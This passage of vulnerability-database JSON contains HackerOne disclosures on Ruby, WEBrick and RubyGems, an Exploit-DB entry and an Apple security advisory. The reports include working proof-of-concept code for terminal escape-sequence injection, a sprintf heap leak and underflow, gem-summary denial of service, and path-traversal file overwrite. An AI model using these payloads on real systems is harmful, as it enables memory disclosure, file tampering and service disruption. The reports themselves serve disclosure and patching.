copying after encountering a NULL byte returning a pointer to zero length string.", "modified": "2017-09-25T12:32:43", "published": "2017-03-01T22:55:39", "id": "H1:209949", "href": "https://hackerone.com/reports/209949", "type": "hackerone", "title": "Ruby: Arbitrary heap exposure in JSON.generate", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-10784"], "description": "WEBrick BasicAuth outputs any non-existing user name to logs without sanitizing. By exploting this, an attacker can inject malicious escape sequences to its logs. This issue is exactly the same as [the old already-fixed vulnerability](https://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection/).\n\nHow to reproduce:\n\n1) Run this WEBrick server program in a terminal.\n\n~~~~\nrequire \"webrick\"\nrequire \"webrick/httpauth\"\n\nsrv = WEBrick::HTTPServer.new({ Port: 34567 })\ndb = WEBrick::HTTPAuth::Htpasswd.new(\"dot.htpasswd\")\nauthenticator = WEBrick::HTTPAuth::BasicAuth.new(UserDB: db, Realm: \"realm\")\nsrv.mount_proc(\"/\") do |req, res|\n authenticator.authenticate(req, res)\n res.body = \"foobar\"\nend\nsrv.start\n~~~~\n\n2) Run this attack access program in another terminal.\n\n~~~~\nrequire \"open-uri\"\n\nopen(\"http://localhost:34567/login\",\n http_basic_authentication: [\n \"ESCAPE SEQUENCE HERE->\\e]2;BOOM!\\a<-SEE WINDOW TITLE\",\n \"passwd\"\n]).read\n~~~~\n\n3) See the first terminal that runs the server. You will see a line like this, and its window title changed \"BOOM!\".\n\n~~~~\n[2017-04-24 19:23:46] ERROR Basic realm: ESCAPE SEQUENCE HERE-><-SEE WINDOW TITLE: the user is not allowed.\n~~~~\n\nNote: I'm a member of the ruby-core team, but I'm not involved with development of WEBrick. I did not create the bug, of course. I will happily accept any bounty if any :-)", "modified": "2017-09-15T05:29:39", "published": "2017-04-24T10:25:41", "id": "H1:223363", "href": "https://hackerone.com/reports/223363", "type": "hackerone", "title": "Ruby: Escape sequence injection vulnerability in WEBrick BasicAuth", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:39:14", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-0899"], "description": "Seems we can include any escape sequence in the \"summary\" field of gemspec. This allows attackers to inject escape sequences to a victim's terminal emulator.\n\n## How to attack\n\n1) An attacker creates a gem with summary string that includes malicious escape sequences, and push it to rubygems.org.\n2) A victim executes `gem search attackers-gem -d`, and the malicious string is printed in the terminal emulator.\n\nIn general, this is considered vulnerable. I'd like you to read [Terminal Emulator Security Issues](http://marc.info/?l=bugtraq&m=104612710031920&w=2) in detail. In short, an attacker can exploit this, not only to surprise a victim with a rainbow string, but also to inject malicious command to a victim's terminal, which may lead to abitrary code execution. Ruby WEBrick also handled a similar issue as [a vulnerability](https://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection/).\n\n\n## Proof of concept\n\n1) Prepare the following gemspec.\n\n~~~\nGem::Specification.new do |spec|\n spec.name = \"escape-sequence-injection-vulnerability\"\n spec.version = \"0.0.1\"\n spec.authors = [\"Yusuke Endoh\"]\n spec.email = [\"mame@ruby-lang.org\"]\n spec.summary = \"foo\\e[31mbar\\e[0mbaz \\e]2;BOOM!\\a\"\n spec.homepage = \"http://example.com/\"\n spec.license = \"MIT\"\nend\n~~~\n\n2) Run the following commands\n\n~~~\ngem build escape-sequence-injection-vulnerability.gemspec\ngem install escape-sequence-injection-vulnerability-0.0.1.gem\n~~~\n\n3) Run the following command.\n\n~~~\ngem query escape-sequence-injection-vulnerability -d && sleep 10\n~~~\n\nYou will see a summary line \"foobarbaz\" (with \"bar\" red), and its window title changed \"BOOM!\".", "modified": "2017-08-30T23:20:55", "published": "2017-05-05T13:35:48", "id": "H1:226335", "href": "https://hackerone.com/reports/226335", "type": "hackerone", "title": "RubyGems: Escape sequence injection in \"summary\" field", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2017-0898"], "description": "In a ticket that was also reported to \"shopify-scripts\" regarding \"MRuby\", I reported in details a combined attack against the sprintf gem:\n* Information leak\n* Heap buffer underflow\n\nThe full ticket details can be found in:\n* Ticket #212239\n* The ticked was opened several minutes ago (but I add it in case it will be handled fast enough to be available to you too), and here are the details:\n\nThis ticket is somehow connected to Ticket #211190, that suggested another fix to the ```CHECK(l)``` macro. The attached code assumed that the ticket will be fixed like it was fixed in MRuby, however the vulnerabilities apply even without the fix, that was aimed at another vulnerability.\n\nTechnical Error 1:\n==============\nThe ```CHECK(l)``` macro can sometimes receive negative values, that will bypass the size checks, since the resize loop is:\n```cpp\n#define CHECK(l) do {\\\n/* int cr = ENC_CODERANGE(result);*/\\\n while ((l) >= bsiz - blen) {\\\n bsiz*=2;\\\n }\\\n mrb_str_resize(mrb, result, bsiz);\\\n/* ENC_CODERANGE_SET(result, cr);*/\\\n buf = RSTRING_PTR(result);\\\n} while (0)\n```\nOne example for reaching a negative \"l\" value is in the \"G\" format when the width is \"2 ** 31 - 20\", causing need to be ```MIN_INT```:\n```cpp\n if ((flags&FWIDTH) && need < width)\n need = width;\n need += 20;\n\n CHECK(need);\n n = snprintf(&buf[blen], need, fbuf, fval);\n blen += n;\n```\nProposed Fix:\n--------------------\nSince there are several such IOFs, the best fix will be a robust check inside the macro itself.\nThe macro should add another check to raise an exception in case ```l < 0```.\n\nTechnical Error 2:\n==============\nStill in the \"G\" format, in case of a huge width, the snprintf call will fail, returning -1:\n```cpp\n n = snprintf(&buf[blen], need, fbuf, fval);\n blen += n;\n```\nThis means that we can decrement blen by 1 for each such format primitive.\nInformation Leak PoC Script:\n```ruby\nsecret_password = \"thisismysuperdupersecretpassword\"\n\nf = 1234567890.12345678\nunique = sprintf(\"% 2147483628G\", f)\n\nsample1 = \"1\" * 50\nsample2 = \"2\" * 100\nsample3 = \"3\" * 200\n\nprint unique.length\nprint unique\n```\nOn 32bit machines, the ```mrb_str_resize(-1)``` will create a string of length -1 with a data buffer realloced with size 0 (= -1 + 1). The resulting output is:\n```\nhexdump sprintf_leak.bin\n0000000 312d 0000 0000 0000 0000 0000 0000 0000\n0000010 0000 0000 0000 0000 0000 0000 0000 0000\n*\n0000080 0000 0000 0000 0039 0000 3131 3131 3131\n0000090 3131 3131 3131 3131 3131 3131 3131 3131\n*\n00000b0 3131 3131 3131 3131 3131 3131 0000 0071\n00000c0 0000 3232 3232 3232 3232 3232 3232 3232\n00000d0 3232 3232 3232 3232 3232 3232 3232 3232\n*\n0000120 3232 3232 3232 0000 0000 0000 0000 00d1\n0000130 0000 3333 3333 3333 3333 3333 3333 3333\n0000140 3333 3333 3333 3333 3333 3333 3333 3333\n*\n00001f0 3333 3333 3333 3333 3333 0000 0000 05c9\n0000200 0000 ca20 b76f ca20 b76f ebd8 095d ebd8\n0000210 095d 0000 0000 0000 0000 0000 0000 0000\n0000220 0000 0000 0000 0000 0000 0000 0000 0000\n*\n00007c0 0000 05c8 0000 0010 0000 001b 0000 0001\n00007d0 0000 e048 095d 0029 0000 6874 7369 7369\n00007e0 796d 7573 6570 6472 7075 7265 6573 7263\n00007f0 7465 6170 7373 6f77 6472 0000 0000 0021\n0000800 0000 0810 0000 e2c0 0959 0000 0000 0020\n0000810 0000 e0f0 095d f200 095d 0000 0000 0029\n0000820 0000 6874 7369 7369 796d 7573 6570 6472\n0000830 7075 7265 6573 7263 7465 6170 7373 6f77\n0000840 6472 0000 0000 0019 0000 2025 3132 3734\n0000850 3834 3633 3832 0047 0000 0000 0000 0021\n0000860 0000 0810 0000 e2c0 0959 0000 0000 000d\n0000870 0000 e108 095d f260 095d 0000 0000 0019\n0000880 0000 2025 3132 3734 3834 3633 3832 0047\n0000890 0000 0000 0000 0021 0000 8010 0001 e2c0\n00008a0 0959 0000 0000 0031 0000 0000 0000 0000\n00008b0 0000 0000 0000 0021 0000 8010 0001 e2c0\n00008c0 0959 0000 0000 0032 0000 0000 0000 0000\n00008d0 0000 0000 0000 0021 0000 8010 0001 e2c0\n00008e0 0959 0000 0000 0033 0000 0000 0000 0000\n00008f0 0000 0000 0000 dd31 0001 0000 0000 0000\n0000900 0000 0000 0000 0000 0000 0000 0000 0000\n*\n0001000\n```\nAnd a close look will tell us that:\n* The print of unique.length returned -1: 0x2d, 0x31\n* Our \"secret password\" can be found at the last memory block of the dump.\n\nHeap buffer underflow PoC Script:\n--------------------------------------------------\n```ruby\nf = 1234567890.12345678\nformat = \"% 2147483628G\" * 10 + \"!!!!!!!!!!!\"\n\nstr1 = \"1\" * 120\nunique = sprintf(format, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f)\nprint str1\n```\nDecrementing ```blen``` 10 times, will result in a buffer underflow of 10 bytes, that will write '!' on the str1, as can be seen in the dump:\n```\n*** Error in `./mruby': double free or corruption (out): 0x09905b30 ***\n======= Backtrace: =========\n/lib/i386-linux-gnu/libc.so.6(+0x67257)[0xb7530257]\n/lib/i386-linux-gnu/libc.so.6(+0x6d577)[0xb7536577]\n/lib/i386-linux-gnu/libc.so.6(+0x6dd31)[0xb7536d31]\n./mruby[0x804c81b]\n./mruby[0x80593f5]\n./mruby[0x8052760]\n./mruby[0x805a3a0]\n./mruby[0x80596bb]\n./mruby[0x80596f8]\n./mruby[0x804ce4d]\n./mruby[0x8049762]\n./mruby[0x8049c48]\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb74e1637]\n./mruby[0x80491d1]\n======= Memory map: ========\n08048000-080ed000 r-xp 00000000 08:01 2883651 /XXX/mruby/bin/mruby\n080ed000-080ee000 r--p 000a4000 08:01 2883651 /XXX/mruby/bin/mruby\n080ee000-080ef000 rw-p 000a5000 08:01 2883651 /XXX/mruby/bin/mruby\n098c0000-09924000 rw-p 00000000 00:00 0 [heap]\nb7300000-b7321000 rw-p 00000000 00:00 0 \nb7321000-b7400000 ---p 00000000 00:00 0 \nb7495000-b74b1000 r-xp 00000000 08:01 656726 /lib/i386-linux-gnu/libgcc_s.so.1\nb74b1000-b74b2000 rw-p 0001b000 08:01 656726 /lib/i386-linux-gnu/libgcc_s.so.1\nb74c8000-b74c9000 rw-p 00000000 00:00 0 \nb74c9000-b7678000 r-xp 00000000 08:01 656688 /lib/i386-linux-gnu/libc-2.23.so\nb7678000-b7679000 ---p 001af000 08:01 656688 /lib/i386-linux-gnu/libc-2.23.so\nb7679000-b767b000 r--p 001af000 08:01 656688 /lib/i386-linux-gnu/libc-2.23.so\nb767b000-b767c000 rw-p 001b1000 08:01 656688 /lib/i386-linux-gnu/libc-2.23.so\nb767c000-b767f000 rw-p 00000000 00:00 0 \nb767f000-b76d2000 r-xp 00000000 08:01 656758 /lib/i386-linux-gnu/libm-2.23.so\nb76d2000-b76d3000 r--p 00052000 08:01 656758 /lib/i386-linux-gnu/libm-2.23.so\nb76d3000-b76d4000 rw-p 00053000 08:01 656758 /lib/i386-linux-gnu/libm-2.23.so\nb76e9000-b76ec000 rw-p 00000000 00:00 0 \nb76ec000-b76ee000 r--p 00000000 00:00 0 [vvar]\nb76ee000-b76ef000 r-xp 00000000 00:00 0 [vdso]\nb76ef000-b7711000 r-xp 00000000 08:01 656660 /lib/i386-linux-gnu/ld-2.23.so\nb7711000-b7712000 rw-p 00000000 00:00 0 \nb7712000-b7713000 r--p 00022000 08:01 656660 /lib/i386-linux-gnu/ld-2.23.so\nb7713000-b7714000 rw-p 00023000 08:01 656660 /lib/i386-linux-gnu/ld-2.23.so\nbff43000-bff64000 rw-p 00000000 00:00 0 [stack]\n1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!!Aborted (core dumped)\n```\nProposed Fix:\n--------------------\nShould check the return value of ```snprintf ``` for errors, instead of directly using it by adding it to ```blen```.", "modified": "2017-09-22T00:05:00", "published": "2017-03-10T11:48:41", "id": "H1:212241", "href": "https://hackerone.com/reports/212241", "type": "hackerone", "title": "Ruby: sprintf combined format string attack", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:14", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-0900"], "description": "Currently, there is no limit for summary length. I think, pushing a gem whose summary is huge, will make `gem search` unavailable.\n\nThis is not Arbitrary Code Execution, but really easy to attack. According to CVSS v3.0 Calculator, the severity is High (7.5).\n\n## How to attack\n\n1) An attacker creates a gem with huge summary string, and push it to rubygems.org.\n2) A victim runs `gem search -d <substring-of-the-name-of-the-gem>`, but it will give no response.\n\nIt may be good for the gem name to include a frequently-searched keyword, such as \"foo-rails-bar\" or \"foo-sinatra-bar\".\n\n## Proof of concept\n\n1) Prepare the following gemspec.\n\n~~~~\nGem::Specification.new do |spec|\n spec.name = \"huge-summary\"\n spec.version = \"0.0.1\"\n spec.authors = [\"Yusuke Endoh\"]\n spec.email = [\"mame@ruby-lang.org\"]\n spec.summary = \"foo\" * 10000000\n spec.homepage = \"http://example.com/\"\n spec.license = \"MIT\"\nend\n~~~~\n\n2) Run the following commands\n\n~~~~\ngem build huge-summary.gemspec\ngem install huge-summary-0.0.1.gem\n~~~~\n\n3) Run the following command.\n\n~~~~\ngem query huge-summary -d\n~~~~\n\nIt will not answer.", "modified": "2017-08-31T23:19:29", "published": "2017-06-25T07:53:33", "id": "H1:243003", "href": "https://hackerone.com/reports/243003", "type": "hackerone", "title": "RubyGems: No limit of summary length allows Denail of Service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:14", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2017-0901"], "description": "There is no check for `name` field in `metadata.gz`. By assigning a maliciously crafted string like `../../../../../any/where` to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.\n\n## Proof of Concept 1: Create a file anywhere\n\nThis PoC attempts to create a file `/tmp/malicious-0/BOOOOM`.\n\n1) Download the attached file `malicious.gem`.\n2) Run `gem install malicious.gem --no-doc`.\n3) `/tmp/malicious-0/BOOOOM` should be created.\n\n`malicious.gem` assigns `../../../../../../../../../../tmp/malicious` as `name` field. This attack is relatively weak since the path must include a directory named `<name>-<version>`, such as `malicious-0`. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in `/etc/dbus-1/`.\n\n## Proof of Concept 2: Replace `rackup` command\n\nThis PoC attempts to replace `gems/rack-2.0.3/bin/rackup` with a malicious file.\n\n1) Download the attached file `replace-rackup.gem`.\n2) Run `gem install rack -v 2.0.3`.\n3) Run `gem install replace-rackup.gem --no-doc`.\n4) Run `rackup`. It will emit just `BOOOOM!`.\n\n`replace-rackup.gem` assigns `../gems/rack` as `name` field, and contains a malicious file `bin/rackup`. This is really exploitable for attackers.\n\n## Note\n\nFor how to create the malicious gems, see the attached file `src.tar.gz`.\n\nIn my opinion, **this attack is much more dangerous** than the issues I reported recently. I hope you could fix this issue ASAP.", "modified": "2017-08-31T23:18:39", "published": "2017-06-26T09:14:48", "id": "H1:243156", "href": "https://hackerone.com/reports/243156", "type": "hackerone", "title": "RubyGems: Installing a crafted gem package may create or overwrite files", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-09T01:46:31", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2017-09-04T00:00:00", "type": "zdt", "title": "RubyGems < 2.6.13 - Arbitrary File Overwrite Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-0901"], "modified": "2017-09-04T00:00:00", "href": "https://0day.today/exploit/description/28426", "id": "1337DAY-ID-28426", "sourceData": "There is no check for name field in metadata.gz. By assigning a maliciously crafted string like ../../../../../any/where to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.\r\n \r\nProof of Concept 1: Create a file anywhere\r\n \r\nThis PoC attempts to create a file /tmp/malicious-0/BOOOOM.\r\n \r\n1) Download the attached file malicious.gem.\r\n2) Run gem install malicious.gem --no-doc.\r\n3) /tmp/malicious-0/BOOOOM should be created.\r\n \r\nmalicious.gem assigns ../../../../../../../../../../tmp/malicious as name field. This attack is relatively weak since the path must include a directory named <name>-<version>, such as malicious-0. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in /etc/dbus-1/.\r\n \r\nProof of Concept 2: Replace rackup command\r\n \r\nThis PoC attempts to replace gems/rack-2.0.3/bin/rackup with a malicious file.\r\n \r\n1) Download the attached file replace-rackup.gem.\r\n2) Run gem install rack -v 2.0.3.\r\n3) Run gem install replace-rackup.gem --no-doc.\r\n4) Run rackup. It will emit just BOOOOM!.\r\n \r\nreplace-rackup.gem assigns ../gems/rack as name field, and contains a malicious file bin/rackup. This is really exploitable for attackers.\r\n \r\nNote\r\n \r\nFor how to create the malicious gems, see the attached file src.tar.gz.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/28426", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-09-04T19:13:04", "description": "RubyGems < 2.6.13 - Arbitrary File Overwrite. CVE-2017-0901. Local exploit for Linux platform", "published": "2017-09-04T00:00:00", "type": "exploitdb", "title": "RubyGems < 2.6.13 - Arbitrary File Overwrite", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-0901"], "modified": "2017-09-04T00:00:00", "id": "EDB-ID:42611", "href": "https://www.exploit-db.com/exploits/42611/", "sourceData": "There is no check for name field in metadata.gz. By assigning a maliciously crafted string like ../../../../../any/where to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.\r\n\r\nProof of Concept 1: Create a file anywhere\r\n\r\nThis PoC attempts to create a file /tmp/malicious-0/BOOOOM.\r\n\r\n1) Download the attached file malicious.gem.\r\n2) Run gem install malicious.gem --no-doc.\r\n3) /tmp/malicious-0/BOOOOM should be created.\r\n\r\nmalicious.gem assigns ../../../../../../../../../../tmp/malicious as name field. This attack is relatively weak since the path must include a directory named <name>-<version>, such as malicious-0. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in /etc/dbus-1/.\r\n\r\nProof of Concept 2: Replace rackup command\r\n\r\nThis PoC attempts to replace gems/rack-2.0.3/bin/rackup with a malicious file.\r\n\r\n1) Download the attached file replace-rackup.gem.\r\n2) Run gem install rack -v 2.0.3.\r\n3) Run gem install replace-rackup.gem --no-doc.\r\n4) Run rackup. It will emit just BOOOOM!.\r\n\r\nreplace-rackup.gem assigns ../gems/rack as name field, and contains a malicious file bin/rackup. This is really exploitable for attackers.\r\n\r\nNote\r\n\r\nFor how to create the malicious gems, see the attached file src.tar.gz.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42611/"}], "apple": [{"lastseen": "2020-12-24T20:44:09", "bulletinFamily": "software", "cvelist": ["CVE-2017-0898", "CVE-2017-17405", "CVE-2018-4288", "CVE-2018-8778", "CVE-2017-17742", "CVE-2017-10784", "CVE-2018-8780", "CVE-2018-4286", "CVE-2018-4287", "CVE-2018-6913", "CVE-2018-4276", "CVE-2018-4259", "CVE-2017-14033", "CVE-2018-6797", "CVE-2018-4283", "CVE-2018-4285", "CVE-2018-4277", "CVE-2018-4248", "CVE-2018-3665", "CVE-2018-4269", "CVE-2018-4289", "CVE-2018-8777", "CVE-2018-4268", "CVE-2018-4274", "CVE-2018-4293", "CVE-2017-14064", "CVE-2018-4470", "CVE-2018-4280", "CVE-2018-5383", "CVE-2018-4456", "CVE-2018-8779", "CVE-2018-4178", "CVE-2018-4291", "CVE-2018-6914"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan\n\nReleased July 9, 2018\n\n**Accounts**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A malicious application may be able to access local users AppleIDs\n\nDescription: A privacy issue in the handling of Open Directory records was addressed with improved indexing.\n\nCVE-2018-4470: Jacob Greenfield of Commonwealth School\n\nEntry added December 10, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2018-4289: shrek_wzw of Qihoo 360 Nirvan Team\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4268: Mac working with Trend Micro's Zero Day Initiative\n\n**ATS**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4285: Mohamed Ghannam (@_simo36)\n\n**Bluetooth**\n\nAvailable for: MacBook Pro (15-inch, 2018) and MacBook Pro (13-inch, 2018, Four Thunderbolt 3 Ports) \nOther Mac models were addressed with [macOS High Sierra 10.13.5](<https://support.apple.com/kb/HT208849>).\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**CFNetwork**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Cookies may unexpectedly persist in Safari\n\nDescription: A cookie management issue was addressed with improved checks.\n\nCVE-2018-4293: an anonymous researcher\n\n**CoreCrypto**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to break out of its sandbox\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4269: Abraham Masri (@cheesecakeufo)\n\n**CUPS**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.5\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2018-4276: Jakub Jirasek of Secunia Research at Flexera\n\nEntry added September 25, 2018\n\n**DesktopServices**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: A permissions issue existed in which execute permission was incorrectly granted. This issue was addressed with improved permission validation.\n\nCVE-2018-4178: Arjen Hendrikse\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4456: Tyler Bohan of Cisco Talos\n\nEntry updated January 22, 2019\n\n**IOGraphics**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2018-4283: @panicaII working with Trend Micro's Zero Day Initiative\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.5\n\nImpact: Systems using Intel\u00ae Core-based microprocessors may potentially allow a local process to infer data utilizing Lazy FP state restore from another process through a speculative execution side channel\n\nDescription: Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value.\n\nAn information disclosure issue was addressed with FP/SIMD register state sanitization.\n\nCVE-2018-3665: Julian Stecklina of Amazon Germany, Thomas Prescher of Cyberus Technology GmbH (cyberus-technology.de), Zdenek Sojka of SYSGO AG (sysgo.com), and Colin Percival\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Mounting a maliciously crafted NFS network share may lead to arbitrary code execution with system privileges\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4259: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4286: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4287: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4288: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4291: Kevin Backhouse of Semmle and LGTM.com\n\nEntry added October 30, 2018\n\n**libxpc**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.5\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4280: Brandon Azad\n\n**libxpc**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4248: Brandon Azad\n\n**LinkPresentation**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4277: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Perl**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Multiple buffer overflow issues existed in Perl\n\nDescription: Multiple issues in Perl were addressed with improved memory handling.\n\nCVE-2018-6797: Brian Carpenter\n\nCVE-2018-6913: GwanYeong Kim\n\nEntry added October 30, 2018\n\n**Ruby**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: Multiple issues in Ruby were addressed in this update.\n\nCVE-2017-0898\n\nCVE-2017-10784\n\nCVE-2017-14033\n\nCVE-2017-14064\n\nCVE-2017-17405\n\nCVE-2017-17742\n\nCVE-2018-6914\n\nCVE-2018-8777\n\nCVE-2018-8778\n\nCVE-2018-8779\n\nCVE-2018-8780\n\nEntry added October 30, 2018\n\n**WebKit**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4274: Tomasz Bojarski\n\nEntry added July 28, 2020\n\n\n\n## Additional recognition\n\n**App Store**\n\nWe would like to acknowledge Jesse Endahl &amp; Stevie Hryciw of Fleetsmith, and Max B\u00e9langer of Dropbox for their assistance.\n\nEntry added August 8, 2018\n\n**Help Viewer**\n\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing for their assistance with four mitigations.\n\n**Kernel**\n\nWe would like to acknowledge juwei lin (@panicaII) of Trend Micro working with Trend Micro\u2019s Zero Day Initiative for their assistance.\n\n**Security**\n\nWe would like to acknowledge Brad Dahlsten of Iowa State University for their assistance.\n", "edition": 3, "modified": "2020-07-28T05:29:11", "published": "2020-07-28T05:29:11", "id": "APPLE:HT208937", "href": "https://support.apple.com/kb/HT208937", "title": "About the security content of macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan - Apple Support", "type": "apple", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:20", "bulletinFamily": "software", "cvelist": ["CVE-2017-0898", "CVE-2018-4425", "CVE-2018-4354", "CVE-2018-4406", "CVE-2017-17405", "CVE-2018-4288", "CVE-2018-8778", "CVE-2018-4399", "CVE-2018-4368", "CVE-2017-17742", "CVE-2018-4400", "CVE-2018-4423", "CVE-2018-4407", "CVE-2017-10784", "CVE-2018-8780", "CVE-2018-4286", "CVE-2018-4468", "CVE-2018-4424", "CVE-2018-4410", "CVE-2018-4304", "CVE-2018-4340", "CVE-2018-4287", "CVE-2018-4395", "CVE-2018-4346", "CVE-2018-4403", "CVE-2018-4396", "CVE-2018-4295", "CVE-2018-4153", "CVE-2018-4369", "CVE-2018-4402", "CVE-2018-4187", "CVE-2018-4334", "CVE-2018-4413", "CVE-2018-4420", "CVE-2018-4242", "CVE-2018-4259", "CVE-2017-12613", "CVE-2018-4419", "CVE-2018-4310", "CVE-2017-14033", "CVE-2018-4398", "CVE-2018-4348", "CVE-2018-4401", "CVE-2018-3646", "CVE-2018-4389", "CVE-2018-6797", "CVE-2017-12618", "CVE-2018-4308", "CVE-2018-4371", "CVE-2018-4408", "CVE-2018-4412", "CVE-2018-4350", "CVE-2018-4415", "CVE-2018-4203", "CVE-2018-4326", "CVE-2018-4426", "CVE-2018-8777", "CVE-2018-4342", "CVE-2017-14064", "CVE-2018-4331", "CVE-2018-4393", "CVE-2018-4418", "CVE-2018-4394", 